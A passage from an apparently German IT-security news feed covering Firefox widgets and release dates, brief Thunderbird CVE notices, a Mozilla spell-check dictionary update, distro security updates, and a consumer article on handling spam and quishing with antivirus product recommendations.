<p>Auch beim Widget zur Fußball-WM kann noch ein wenig Geduld vonnöten sein. Nach einem Firefox-Neustart können die Widgets plötzlich vorhanden sein. Das optionale, konfigurierbare Sport-Widget bietet sowohl Spielergebnisse als auch wahlweise einen Ausblick auf die nächsten Spiele. Außerdem zeigt es an, auf welchem TV-Sender ein Spiel in Ihrem Land übertragen wird. Das funktioniert auch auf Android und iOS.</p>


<div class="extendedBlock-wrapper block-coreImage center"><figure data-wp-context='{"imageId":"6a2ba7c407072"}' data-wp-interactive="core/image" class="wp-block-image aligncenter size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/06/ffx-wm-bg-widg.webp?w=1200" alt="Firefox Tapeten und Widget zur Fußball-WM" class="wp-image-3163840" width="1200" height="675" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption"><em>Was nach der WM mit dem Sport-Widget passiert, ist noch unklar.</em></figcaption></figure><p class="imageCredit">fz</p></div>



<p>Sobald in Ihrem Browser verfügbar, finden Sie Widgets und Hintergründe, indem Sie auf der Firefox-Startseite (Neuer-Tab-Seite) rechts unten auf „Anpassen“ klicken. Auch das Firefox-Logo auf der Startseite passt sich dem Thema Fußball an, wenn Sie das Sport-Widget aktivieren. Neben diesem Sport-Widget gibt es auch weitere Widgets, etwa fürs Wetter, eine To-Do-Liste oder eine Weltzeituhr. Das alles müssen Sie nicht nutzen, es ist nur ein Angebot.</p>



<p><strong>Tipp:</strong> Unabhängig davon, dass Sie Ihren Browser stets aktuell halten, sollten Sie die Sicherheit Ihres PCs zusätzlich mit geeigneter Antivirus-Software verbessern. Gute Antivirus-Lösungen stellen wir in „<a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html">Die besten Antivirus-Programme 2025 im Test: So schützen Sie Ihren Windows-PC</a>“ vor. Falls Sie großen Wert auf anonymes Surfen legen, <a href="https://www.pcwelt.de/article/1193534/die-besten-vpn-dienste-im-vergleich.html" target="_blank" rel="noreferrer noopener">sind wiederum gute VPN-Programme einen Blick wert.</a></p>



<p>Am 16. Juni erscheinen Firefox 152, Firefox ESR 140.12, Firefox ESR 115.37.0, Thunderbird 152 und Thunderbird 140.12esr. Einen neuen Tor Browser gibt es dann auch.</p>

</div>]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-14332 | Mozilla Thunderbird up to 145 memory corruption (Nessus ID 278545 / WID-SEC-2025-2812)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 145 and classified as critical. This affects an unknown part. Such manipulation leads to memory corruption.

This vulnerability is referenced as CVE-2025-14332. It is possible to launch the attack remotely. No exploit is available.

It is sug...]]></description>
<link>https://tsecurity.de/de/3592237/sicherheitsluecken/cve-2025-14332-mozilla-thunderbird-up-to-145-memory-corruption-nessus-id-278545-wid-sec-2025-2812/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592237/sicherheitsluecken/cve-2025-14332-mozilla-thunderbird-up-to-145-memory-corruption-nessus-id-278545-wid-sec-2025-2812/</guid>
<pubDate>Fri, 12 Jun 2026 04:38:30 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 145</a> and classified as <a href="https://vuldb.com/kb/risk">critical</a>. This affects an unknown part. Such manipulation leads to memory corruption.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2025-14332">CVE-2025-14332</a>. It is possible to launch the attack remotely. No exploit is available.

It is suggested to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2025-14333 | Mozilla Thunderbird up to 145 memory corruption (Nessus ID 278145 / WID-SEC-2025-2812)]]></title>
<description><![CDATA[A vulnerability was found in Mozilla Thunderbird up to 145. It has been declared as critical. This issue affects some unknown processing. Executing a manipulation can lead to memory corruption.

This vulnerability is tracked as CVE-2025-14333. The attack can be launched remotely. No exploit exist...]]></description>
<link>https://tsecurity.de/de/3592235/sicherheitsluecken/cve-2025-14333-mozilla-thunderbird-up-to-145-memory-corruption-nessus-id-278145-wid-sec-2025-2812/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592235/sicherheitsluecken/cve-2025-14333-mozilla-thunderbird-up-to-145-memory-corruption-nessus-id-278145-wid-sec-2025-2812/</guid>
<pubDate>Fri, 12 Jun 2026 04:38:27 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 145</a>. It has been declared as <a href="https://vuldb.com/kb/risk">critical</a>. This issue affects some unknown processing. Executing a manipulation can lead to memory corruption.

This vulnerability is tracked as <a href="https://vuldb.com/cve/CVE-2025-14333">CVE-2025-14333</a>. The attack can be launched remotely. No exploit exists.

It is recommended to upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-0892 | Mozilla Thunderbird up to 146 memory corruption (Nessus ID 284838 / WID-SEC-2026-0090)]]></title>
<description><![CDATA[A vulnerability, which was classified as critical, was found in Mozilla Thunderbird up to 146. This impacts an unknown function. Such manipulation leads to memory corruption.

This vulnerability is referenced as CVE-2026-0892. It is possible to launch the attack remotely. No exploit is available....]]></description>
<link>https://tsecurity.de/de/3592125/sicherheitsluecken/cve-2026-0892-mozilla-thunderbird-up-to-146-memory-corruption-nessus-id-284838-wid-sec-2026-0090/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592125/sicherheitsluecken/cve-2026-0892-mozilla-thunderbird-up-to-146-memory-corruption-nessus-id-284838-wid-sec-2026-0090/</guid>
<pubDate>Fri, 12 Jun 2026 02:36:35 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability, which was classified as <a href="https://vuldb.com/kb/risk">critical</a>, was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 146</a>. This impacts an unknown function. Such manipulation leads to memory corruption.

This vulnerability is referenced as <a href="https://vuldb.com/cve/CVE-2026-0892">CVE-2026-0892</a>. It is possible to launch the attack remotely. No exploit is available.

You should upgrade the affected component.]]></content:encoded>
</item>
<item>
<title><![CDATA[CVE-2026-0891 | Mozilla Thunderbird up to 146 memory corruption (Nessus ID 284821 / WID-SEC-2026-0090)]]></title>
<description><![CDATA[A vulnerability classified as critical was found in Mozilla Thunderbird up to 146. The impacted element is an unknown function. The manipulation results in memory corruption.

This vulnerability was named CVE-2026-0891. The attack may be performed from remote. There is no available exploit.

Upgr...]]></description>
<link>https://tsecurity.de/de/3592054/sicherheitsluecken/cve-2026-0891-mozilla-thunderbird-up-to-146-memory-corruption-nessus-id-284821-wid-sec-2026-0090/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3592054/sicherheitsluecken/cve-2026-0891-mozilla-thunderbird-up-to-146-memory-corruption-nessus-id-284821-wid-sec-2026-0090/</guid>
<pubDate>Fri, 12 Jun 2026 01:35:57 +0200</pubDate>
<category>🕵️ Sicherheitslücken</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[A vulnerability classified as <a href="https://vuldb.com/kb/risk">critical</a> was found in <a href="https://vuldb.com/product/mozilla:thunderbird">Mozilla Thunderbird up to 146</a>. The impacted element is an unknown function. The manipulation results in memory corruption.

This vulnerability was named <a href="https://vuldb.com/cve/CVE-2026-0891">CVE-2026-0891</a>. The attack may be performed from remote. There is no available exploit.

Upgrading the affected component is advised.]]></content:encoded>
</item>
<item>
<title><![CDATA[Pascal Chevrel: Spell-checking for more Firefox users — a community effort]]></title>
<description><![CDATA[A while back, I stumbled onto something that turned into a rewarding side-project at Mozilla.

Firefox ships with a built-in spellchecker, but it only activates if a dictionary for your language is bundled with the browser. Coverage had grown organically over the years — driven largely by localiz...]]></description>
<link>https://tsecurity.de/de/3590866/tools/pascal-chevrel-spell-checking-for-more-firefox-users-a-community-effort/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3590866/tools/pascal-chevrel-spell-checking-for-more-firefox-users-a-community-effort/</guid>
<pubDate>Thu, 11 Jun 2026 16:24:27 +0200</pubDate>
<category>💾  Tools</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<p>A while back, I stumbled onto something that turned into a rewarding side-project at Mozilla.</p>

<p>Firefox ships with a built-in spellchecker, but it only activates if a dictionary for your language is bundled with the browser. Coverage had grown organically over the years — driven largely by localizers and community members adding support for their own languages. Dictionary work was actually very active in the early years of the Mozilla project, but like many things in a large open-source codebase with a lot to manage, it had quietly received less attention over time, for no particularly good reason. So I decided to change that.</p>

<h3>Taking stock</h3>

<p>I put together a full <a href="https://vanilla.pascalc.net/dictionaries/">inventory dashboard</a> of every third-party dictionary shipped in Firefox Desktop, cataloguing sources, upstream health, and — critically — licensing.</p>

<p>Licensing turns out to be the main bottleneck. Firefox is open-source software, so any dictionary we ship has to carry a licence compatible with the Mozilla codebase. Some excellent dictionaries exist for languages Firefox supports, but their licences don't allow direct inclusion. In those cases, the dictionary can still reach users — but only as a Firefox extension they have to find and install manually, rather than something that just works out of the box.</p>

<p>The goal of the inventory wasn't to point fingers at anything. It was to make the full picture visible, so that anyone who wanted to help would know exactly where to start.</p>

<h3>Plugging into the community</h3>

<p>Once the inventory existed, the work was really about connecting the right people. Mozilla's localizer community already had the expertise and motivation — what was sometimes missing was a clear entry point. I took care of all the patches myself, so that localizers wouldn't have to deal with the technical side of things. This work was done in coordination with Mozilla's Localization drivers team, who own the dictionary infrastructure and reviewed and merged the changes.</p>

<h3>The results</h3>

<p>We expanded the number of locales shipping with a built-in dictionary <strong>from 30 to 41</strong>. This shipped last week with Firefox 151.0.3, and these improvements also benefit Thunderbird users, since both applications share the same dictionary infrastructure.</p>

<p>New dictionaries added: Croatian, English (UK), Georgian, Persian, Slovenian, Tajik, Tamil, Tibetan, Turkish, Welsh, and Xhosa.</p>

<p>Updated dictionaries: Bulgarian, Danish, French, Hungarian, Indonesian, Latvian, Polish, Romansh, and Swedish.</p>

<h3>Stirring the pot</h3>

<p>Part of the reason for doing this work publicly — building the inventory, filing the bugs, making the gaps visible — was to give people with the right expertise a reason to step in themselves. That's exactly what happened.</p>

<p>For Turkish and Russian, the existing open-source Hunspell dictionaries had become outdated — vocabulary and linguistic rules that hadn't kept pace with how the languages are actually used today. Selim (our Turkish l10n lead) and Valentin (our Russian l10n lead) each decided to take matters into their own hands.</p>

<p>Selim forked the <a href="https://github.com/tdd-ai/hunspell-tr">TDD Turkish dictionary</a> and updated it with modern vocabulary, better circumflex support, and performance improvements — the result is <a href="https://github.com/selimsum/hunspell-tr-moz">hunspell-tr-moz</a>, now shipping in Firefox 151.0.3. Valentin built a new modern Russian dictionary from scratch, <a href="https://github.com/Goudron/ru-spelling-dictionary">ru-spelling-dictionary</a>, released under MPL-2.0. It's currently available as a <a href="https://addons.mozilla.org/en-US/firefox/addon/russian-spell-dictionary/">Firefox extension</a> — if you use Russian, Valentin would appreciate feedback on the quality before it's integrated directly into Firefox.</p>

<p>Both projects are public and open-source.</p>

<h3>What's still in the pipeline</h3>

<p>The licence question is also quietly resolving itself for a couple more locales. The maintainers of the Kabyle and Asturian dictionaries have agreed to relicense their work to allow direct inclusion in Firefox. Once that's done, those communities will join the list too.</p>

<p>There are still gaps in the inventory. Some are licence issues that may resolve over time. But for many of the remaining locales, the honest answer is that we simply haven't looked hard enough yet. Dictionaries are often individual passion projects or work coming out of linguistics circles — they exist, but finding them takes investigation. If you know of a dictionary for a language Firefox doesn't currently support, that's exactly the kind of lead worth following up on.</p>

<h3>An open invitation</h3>

<p>Mozilla is still a place where a motivated contributor can find a corner of the project, do meaningful work, and have a real impact — without needing to be a browser engineer or a Mozilla insider.</p>

<p>The <a href="https://vanilla.pascalc.net/dictionaries/">inventory dashboard</a> is public. If you're a localizer, a linguist, or a dictionary maintainer and you want to help bring spellchecking to more Firefox users, the gaps are clearly documented. And if you maintain a dictionary that could be included but licensing is an obstacle, that's a conversation worth having.</p>

<p>See you in May 2027 for the next update.</p>]]></content:encoded>
</item>
<item>
<title><![CDATA[Security updates for Monday]]></title>
<description><![CDATA[Security updates have been issued by AlmaLinux (bind, bind9.16, frr, kernel, kernel-rt, libexif, mysql, php, and unbound), Debian (apache2, chromium, glibc, gsasl, jackson-core, libxml2, nginx, request-tracker4, request-tracker5, tomcat10, tomcat11, and tomcat9), Fedora (chromium, firefox, havege...]]></description>
<link>https://tsecurity.de/de/3581624/linux-tipps/security-updates-for-monday/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581624/linux-tipps/security-updates-for-monday/</guid>
<pubDate>Mon, 08 Jun 2026 15:39:54 +0200</pubDate>
<category>🐧 Linux Tipps</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[Security updates have been issued by <b>AlmaLinux</b> (bind, bind9.16, frr, kernel, kernel-rt, libexif, mysql, php, and unbound), <b>Debian</b> (apache2, chromium, glibc, gsasl, jackson-core, libxml2, nginx, request-tracker4, request-tracker5, tomcat10, tomcat11, and tomcat9), <b>Fedora</b> (chromium, firefox, haveged, keylime, libinput, libssh2, nasm, perl-CryptX, rust, thunderbird, and webkitgtk), <b>Mageia</b> (cockpit, golang-x-crypto, golang-x-sys-devel, kernel, kmod-virtualbox, kmod-xtables-addons, kernel-linus, perl-DBIx-Class-EncodedColumn, perl-Crypt-URandom-Token, xdg-dbus-proxy, and xmlrpc-c), <b>Slackware</b> (samba), and <b>SUSE</b> (7zip, amazon-ssm-agent, ansible-13, ansible-core, assimp-devel, bind, cacti, chromium, dpkg, epiphany, erlang27, evince, ffmpeg-4, freerdp, frr, git-bug, google-guest-agent, grafana, hauler, ignition, jq, kanidm, kernel, keybase-client, libjxl, libmariadbd-devel, libmozjs-115-0, libopenbabel8, libsoup2, mariadb, mcphost, networkmanager, openssh, perl-HTTP-Daemon, perl-HTTP-Tiny, perl-IO-Compress, perl-Sereal-Decoder, perl-xml-libxml, postgresql18, python-pyopenssl, python311-pip, tomcat, tomcat10, tomcat11, tor, trivy, unbound, uriparser, vifm, weblate, xorg-x11-server, and yq).]]></content:encoded>
</item>
<item>
<title><![CDATA[Spam-Mails nie sofort löschen – aus diesem einfachen Grund]]></title>
<description><![CDATA[Spam- und Phishing-Mails gehören zum lästigen Alltag – und nerven uns alle. Dabei hat sich die Bedrohung zuletzt deutlich verschärft: Denn die Zeiten, in denen man Betrüger sofort an plumpen Übersetzungsfehlern und holprigem „Google-Translate-Deutsch“ erkennen konnte, sind vorbei.



Mit moderner...]]></description>
<link>https://tsecurity.de/de/3581096/it-nachrichten/spam-mails-nie-sofort-loeschen-aus-diesem-einfachen-grund/</link>
<guid isPermaLink="true">https://tsecurity.de/de/3581096/it-nachrichten/spam-mails-nie-sofort-loeschen-aus-diesem-einfachen-grund/</guid>
<pubDate>Mon, 08 Jun 2026 12:32:21 +0200</pubDate>
<category>📰 IT Nachrichten</category>
<source url="https://tsecurity.de">tsecurity.de</source>
<content:encoded><![CDATA[<div>
<section class="wp-block-bigbite-multi-title"><div class="container"></div></section>



<p>Spam- und Phishing-Mails gehören zum lästigen Alltag – und nerven uns alle. Dabei hat sich die Bedrohung zuletzt deutlich verschärft: Denn die Zeiten, in denen man Betrüger sofort an plumpen Übersetzungsfehlern und holprigem „Google-Translate-Deutsch“ erkennen konnte, sind vorbei.</p>



<p>Mit moderner KI verfassen Kriminelle heute Texte, die grammatikalisch perfekt und im Tonfall absolut professionell wirken. Gleichzeitig greifen die Betrüger mit neuen perfiden Maschen immer tiefer in die Scam-Trickkiste.</p>



<p>Wie eine noch immer <a href="https://www.bitkom.org/sites/main/files/2025-10/bitkom-studienbericht-cyberkriminalitaet-2025.pdf" target="_blank" rel="noreferrer noopener">aktuelle Bitkom-Studie</a> aus dem Jahr 2025 zeigt, ist die Lage ernst: 61 Prozent der Internetnutzenden waren in den vergangenen zwölf Monaten Opfer von Cyberkriminalität.</p>



<p>Das kann durchaus kostspielig werden: Der durchschnittliche Schaden pro <strong>Betroffenem liegt mittlerweile bei 219 Euro</strong>. Trotz dieser Zahlen schätzen aber nur 37 Prozent die Gefahr für sich persönlich als hoch ein – eine riskante Lücke in der Selbstwahrnehmung.</p>



<p>Doch jetzt die überraschende Nachricht<strong>: Spam-Mails im Postfach sollten Sie nicht immer pauschal löschen</strong>. Die betrügerischen Nachrichten können nämlich durchaus einen Zweck erfüllen – allerdings einen ganz anderen, als es die Absender damit im Sinn haben.</p>



<h2 class="wp-block-heading">Warum Sie Spam-Mails nicht einfach löschen sollten</h2>



<p>So komisch es klingt: Spam kann nützlich sein – und zwar für die potenziellen Opfer, die Betrüger eigentlich im Visier haben. Alle größeren Mail-Provider setzen zunehmend auf komplexe, KI-gestützte Spamfilter, die immer besser darin werden, gewünschte E-Mails von unerwünschter Netzpost zu unterscheiden. Eine wichtige Voraussetzung für diesen Lerneffekt: Die Software muss trainiert werden – und genau dafür sind Spam-Mails hilfreich.</p>



<p>Statt Spam-Mails einfach zu löschen, sollten Sie daher wie folgt vorgehen:</p>



<ul class="wp-block-list">
<li><strong>Wenn Sie einen E-Mail-Client wie Outlook oder Thunderbird nutzen:</strong> Markieren Sie entsprechende Nachrichten manuell als Spam (oder als „Junk“), falls es Ihr E-Mail-Programm nicht schon selbst erledigt hat. So trainieren Sie den Spamfilter der Software, der Sie mit solchen Nachhilfestunden künftig besser schützen kann. In Unternehmen werden solche Informationen oft an den zentralen Mail-Server weitergegeben, wodurch auch der Filter für Kollegen im Netzwerk schlauer wird.</li>



<li><strong>Wenn Sie E-Mails über den Browser abrufen:</strong> Markieren Sie die Nachrichten im Posteingang und nutzen Sie den Befehl „Spam“ oder „Junk“. Damit melden Sie das Muster direkt an den Provider, der den Filter daraufhin global schärfen kann.</li>
</ul>



<p>Durch das aktive Markieren werden Sie Teil eines globalen Spam-Immunsystems. Moderne Provider erstellen aus gemeldeten Mails sogenannte Hash-Werte (digitale Fingerabdrücke). Je mehr Nutzer eine Nachricht als Spam melden, desto schneller wird die gesamte Welle weltweit für Millionen andere Konten blockiert. Sie schützen also nicht nur sich selbst, sondern tragen zur kollektiven Sicherheit im Netz bei.</p>



<p><strong>Tipp</strong>: Junk-Mails werden in der Regel nach 30 Tagen automatisch aus den entsprechenden Ordnern gelöscht. Speicherplatzprobleme sind daher selten ein Grund zur Sorge, auch wenn man die Nachrichten nicht sofort manuell entfernt. Sollte sich der Junk-Ordner nicht von selbst leeren, reicht es, den Inhalt einmal im Monat zu löschen.</p>



<h2 class="wp-block-heading">Vorsicht vor der neuen Masche: Quishing</h2>



<p>Neben klassischem Text-Spam verbreitet sich aktuell das sogenannte <strong>Quishing</strong> (QR-Code-Phishing). Dabei verstecken Betrüger bösartige Links in einem QR-Code, den Sie scannen sollen – etwa für eine angebliche Paket-Umleitung oder eine vermeintliche Bank-Verifizierung. Da viele Spam- oder Viren-Filter QR-Codes in Bildern schlechter analysieren können als herkömmliche Links, ist hier besondere Vorsicht geboten. Zudem zielt der Scan oft auf das Smartphone ab, das mitunter schlechter geschützt ist als Ihr PC.</p>



<p><strong>Wichtig:</strong> Inzwischen wird Quishing oft mit Social Engineering kombiniert. In der E-Mail wird dann beispielsweise auf ein angebliches Video oder eine wichtige Sprachnachricht verwiesen. Seien Sie misstrauisch, wenn eine Nachricht Sie emotional unter Druck setzt oder zu einer dringenden Handlung auffordert. Perfektes Deutsch ist dank KI heute kein Echtheitsbeweis mehr. <strong>Scannen Sie niemals QR-Codes direkt aus einer fragwürdigen E-Mail!</strong> Weitere Infos zu Quishing und Vishing <a href="https://www.pcwelt.de/article/1948631/vishing-betrug-erklaerung.html" target="_blank" rel="noreferrer noopener">finden Sie hier.</a></p>



<h2 class="wp-block-heading">Achtung: Spam-Mails niemals abbestellen</h2>



<p>Viele Mail-Provider bieten eine einfache Möglichkeit, Newsletter mit einem Klick abzubestellen. Bei Betrugsnachrichten ist das aber gefährlich. Dem Absender teilen Sie damit nämlich ungewollt mit, dass Ihre E-Mail-Adresse existiert und aktiv genutzt wird. Die Kriminellen erhalten so also eine für sie wertvolle Bestätigung – die Frequenz von Spam-Nachrichten kann sich in der Folge noch erhöhen, vielleicht wird Ihre „verifizierte“ E-Mail-Adresse auch an andere Betrüger weitergegeben.</p>



<p><a href="https://www.pcwelt.de/article/2255713/test-bestes-antivirus-programm-windows.html" target="_blank" rel="noreferrer noopener">Die besten Antivirus-Programme im Test: So schützen Sie Ihren Windows-PC</a></p>



<h2 class="wp-block-heading">Tipps gegen Spam: So verhalten Sie sich richtig</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2699ff85d58"}' data-wp-interactive="core/image" class="wp-block-image size-large is-resized wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2026/02/BSI-warnt-vor-Spam.png?w=1200" alt="BSI warnt vor Spam" class="wp-image-3054652" width="1200" height="828" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Auch das  Bundesamt für Sicherheit in der Informationstechnik (BSI) <a href="https://www.bsi.bund.de/DE/Themen/Verbraucherinnen-und-Verbraucher/Cyber-Sicherheitslage/Methoden-der-Cyber-Kriminalitaet/Spam-Phishing-Co/Spam/spam.html" target="_blank" rel="noreferrer noopener">warnt vor Spam und gibt Tipps</a>.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Mit ein paar einfachen Regeln können Sie sich besser schützen:</p>



<ul class="wp-block-list">
<li>(<strong>KI-)Skepsis:</strong> Vertrauen Sie nicht allein auf fehlerfreie Sprache oder gute Grammatik. Achten Sie auch auf den Inhalt. Werden Sie unter Druck gesetzt? Sollen Sie besonders schnell handeln? Das sind klare Warnzeichen.</li>



<li><strong>Ruhe bewahren</strong>: Wenn jemand in einer vermeintlich dringenden E-Mail zu raschem (und damit unüberlegtem) Handeln auffordert, sollten Sie misstrauisch werden. Ehrliche Unternehmen bauen keinen Druck auf Kunden auf und drohen nicht sofort mit Mahnungen, wenn man Aufforderungen nicht sofort nachkommt.</li>



<li><strong>2-Faktor-Authentifizierung (2FA):</strong> Laut Bitkom-Studie nutzt bislang nur etwa die Hälfte der Nutzer diese Schutzfunktion. Aktivieren Sie 2FA überall, wo es möglich ist – sie ist die effektivste Barriere, falls Zugangsdaten doch einmal in falsche Hände geraten.</li>



<li><strong>Links und QR-Codes meiden:</strong> Geben Sie Internetadressen lieber manuell im Browser ein.</li>



<li><strong>Keine unbekannten Anhänge öffnen:</strong> In Excel-Tabellen, Word-Dokumenten oder HTML-Dateien kann sich Schadsoftware verbergen.</li>
</ul>



<p><strong>Lesen Sie weiter zum Thema:</strong> Phishing, Fake-Shops, Betrug: <a href="https://www.pcwelt.de/article/3037131/sicherheitsexperten-so-schuetzen-sie-sich-vor-phishing-fake-shops.html" target="_blank" rel="noreferrer noopener">Sechs Experten verraten, wie Sie sich schützen</a></p>



<h2 class="wp-block-heading">Digitale Bodyguards: Mit diesen Antispam- und Antiviren-Programmen sind Sie auf der sicheren Seite</h2>



<p>Spammer und Scammer werden immer raffinierter. Selbst erfahrene Nutzer können den dreisten Ganoven auf den Leim gehen. Wer sich besser schützen möchte, kann deswegen zu professioneller Software greifen – die macht den Schurken im Netz das Leben schwer.</p>



<p><a href="https://www.pcwelt.de/article/2392847/top-9-phishing-betruegereien-2024.html" target="_blank" rel="noreferrer noopener">Die gefährlichsten Phishing-Betrügereien</a></p>



<h2 class="wp-block-heading">Bitdefender Total Security</h2>


<div class="extendedBlock-wrapper block-coreImage undefined"><figure data-wp-context='{"imageId":"6a2699ff865a5"}' data-wp-interactive="core/image" class="wp-block-image size-large wp-lightbox-container"><img decoding="async" data-wp-class--hide="state.isContentHidden" data-wp-class--show="state.isContentVisible" data-wp-init="callbacks.setButtonStyles" data-wp-on-async--click="actions.showLightbox" data-wp-on-async--load="callbacks.setButtonStyles" data-wp-on-async-window--resize="callbacks.setButtonStyles" src="https://b2c-contenthub.com/wp-content/uploads/2024/11/bitdefender-total-security.jpg?quality=50&amp;strip=all&amp;w=1200" alt="bitdefender total security" class="wp-image-2537895" width="1200" height="672" loading="lazy"><button class="lightbox-trigger" type="button" aria-haspopup="dialog" aria-label="Enlarge" data-wp-init="callbacks.initTriggerButton" data-wp-on-async--click="actions.showLightbox" data-wp-style--right="state.imageButtonRight" data-wp-style--top="state.imageButtonTop">
				<svg xmlns="http://www.w3.org/2000/svg" width="12" height="12" fill="none" viewbox="0 0 12 12">
					<path fill="#fff" d="M2 0a2 2 0 0 0-2 2v2h1.5V2a.5.5 0 0 1 .5-.5h2V0H2Zm2 10.5H2a.5.5 0 0 1-.5-.5V8H0v2a2 2 0 0 0 2 2h2v-1.5ZM8 12v-1.5h2a.5.5 0 0 0 .5-.5V8H12v2a2 2 0 0 1-2 2H8Zm2-12a2 2 0 0 1 2 2v2h-1.5V2a.5.5 0 0 0-.5-.5H8V0h2Z"></path>
				</svg>
			</button><figcaption class="wp-element-caption">Starker Virenschutz und einer der besten Scam-Detektoren: <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=https://www.bitdefender.com/de-de/consumer/total-security" target="_blank" rel="noreferrer noopener">Bitdefender Total Security</a> ist in den vergangenen Jahren immer besser geworden.</figcaption></figure><p class="imageCredit">Foundry</p></div>



<p>Ergattert auch in den <a href="https://www.pcwelt.de/article/2230829/bitdefender-total-security-test-2.html" target="_blank" rel="noreferrer noopener">Tests der PC-Welt</a> regelmäßig Spitzenplätze: <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=https://www.bitdefender.com/de-de/consumer/total-security" target="_blank" rel="noreferrer noopener">Bitdefender Total Security</a> hat sich auf den Schutz vor Online-Abzockern und Schadsoftware spezialisiert und bietet Funktionen vom Virenschutz über eine Firewall bis hin zur Abwehr von Ransomware. Bitdefender schützt auch vor Netzwerk-, Web- und E-Mail-Problemen wie Brute-Force-Attacken, nimmt bösartige Links aufs Korn und warnt vor gefährlichen Anhängen im Postfach. Dort spürt die Software auch Spam auf, wenn Sie Mozilla Thunderbird oder Microsoft Outlook nutzen.</p>



<p>Mit einem Scam-Detektor (“Scammio”) <a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=https://www.bitdefender.com/de-de/consumer/scamio#columns" target="_blank" rel="noreferrer noopener">können Sie bei Bitdefender auch kostenlos chatten</a>. Dem Bot kann man verdächtige Nachrichten zeigen und eine Einschätzung dazu abfragen.</p>



<p><a href="https://www.awin1.com/cread.php?awinaffid=486277&amp;awinmid=11660&amp;clickref=rss&amp;ued=https://www.bitdefender.com/de-de/consumer/total-security#products" target="_blank" rel="noreferrer noopener">Hier geht’s zum Angebot</a></p>



<hr class="wp-block-separator has-text-color has-vivid-red-color has-alpha-channel-opacity has-vivid-red-background-color has-background">



<h2 class="wp-block-heading">Avast One: Günstige Lösung mit starker Leistung und modernem Design</h2>


